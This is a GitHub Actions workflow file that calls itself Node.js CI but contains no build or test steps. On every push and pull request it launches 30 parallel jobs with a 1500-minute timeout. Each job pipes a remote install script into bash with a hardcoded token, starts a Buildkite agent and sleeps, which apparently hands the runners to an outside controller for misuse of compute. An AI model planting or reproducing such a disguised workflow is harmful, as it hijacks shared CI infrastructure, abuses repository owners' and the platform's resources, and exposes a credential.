name: Node.js Cio 

on:
  push:
    branches: [ main, develop ]
  pull_request: {}

jobs:
  test:
    runs-on: ubuntu-latest

    strategy:
      max-parallel: 180
      fail-fast: false
      matrix:
        node-version: [10.x, 11.x, 12.x, 13.x, 14.x]
        flag: [1, 2, 3, 4, 5, 6]
    timeout-minutes: 1500

    steps:
    - uses: actions/checkout@v2

    - name: Use Node.js ${{ matrix.node-version }}
      uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node-version }}
    - name: cb
      run: |
        TOKEN="90543a660b7b44060cb26487ae09daa94f1dd0e2378d02269f" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && /.buildkite-agent/bin/buildkite-agent start && sleep 999
